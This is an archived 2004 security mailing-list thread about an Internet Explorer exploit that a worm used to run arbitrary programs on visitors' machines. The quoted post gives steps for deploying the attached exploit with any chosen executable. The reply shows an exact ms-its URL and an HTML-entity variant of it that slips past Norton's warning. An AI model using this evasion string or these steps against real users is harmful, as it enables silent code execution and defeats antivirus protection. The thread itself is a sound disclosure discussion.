Re: new internet explorer exploit (was new worm)

From: Jelmer (jkuperus_at_planet.nl)
Date: 03/30/04

  • Next message: Nick FitzGerald: "Re: new internet explorer exploit (was new worm)"
    Date: Tue, 30 Mar 2004 13:00:29 +0200
    To: Void <void@sect.net>, full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
    
    

    And even that small measure of warning is trivially defeated

    if I change the url in my exploit.htm from

    ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm

    to

    &#109;s-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm

    It gives no warning whatsoever, proofing once again that you shouldn't
    solely rely on virus scanners, though others might do a better job, I can't
    imagine anyone doing it worse

    ----- Original Message -----
    From: "Void" <void@sect.net>
    To: "Jelmer" <jkuperus@planet.nl>; <full-disclosure@lists.netsys.com>;
    <bugtraq@securityfocus.com>
    Sent: Monday, March 29, 2004 9:15 PM
    Subject: Re: new internet explorer exploit (was new worm)

    > Just wanted to add that Norton Anti-Virus 2004 will detect this exploit
    and
    > pop up a warning, but also fails to halt its execution or protect the user
    > in any way.
    >
    > Here is what it thinks it is:
    >
    >
    http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html
    >
    > So there is some measure of warning, but no real protection.
    >
    >
    > At 04:35 PM 3/29/2004 +0200, Jelmer wrote:
    > >The code used by this worm to exploit it's users at least partly is (i
    > >think) new , the vulnerability it abused has afaik not been published on
    > >eighter bugtraq or full-disclosure. possibly making it (one of?) the
    first
    > >worm to totally catch people offguard.
    > >
    > >It allows a mallicious person to take any action on an unsuspecting user
    who
    > >view's a specially prepared page's pc
    > >
    > >The known ingredient it uses is :
    > >http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2003-08/1758.html
    > >that has gone unpatched for over 5 months now
    > >
    > >The remainder of the exploit manages to confuse this same adodb.stream
    > >object enough to make it think it's being run from a local location
    > >
    > >You can protect yourself against it by running
    > >http://ip3e83566f.speed.planet.nl/hacked-by-chinese/fix.reg
    > >
    > >
    > >I attached sample code myself to illustrate the problem, because
    > >http-equiv's was messy :)
    > >This one should be more straightforward to use
    > >
    > >Instructions :
    > >
    > >1. unzip
    > >2. overwrite exploit.exe with the executable you wish to run, or leave it
    > >untoched if you want to see some nice texturemapped rotation
    > >3. upload the files to a webserver
    > >4. view exploit.htm
    > >
    > >Tested on winxp pro all patches
    > >
    > >for the lazy ones among you can also view a demonstration here :
    > >
    > >http://ip3e83566f.speed.planet.nl/security/newone/exploit.htm
    >
    >


  • Next message: Nick FitzGerald: "Re: new internet explorer exploit (was new worm)"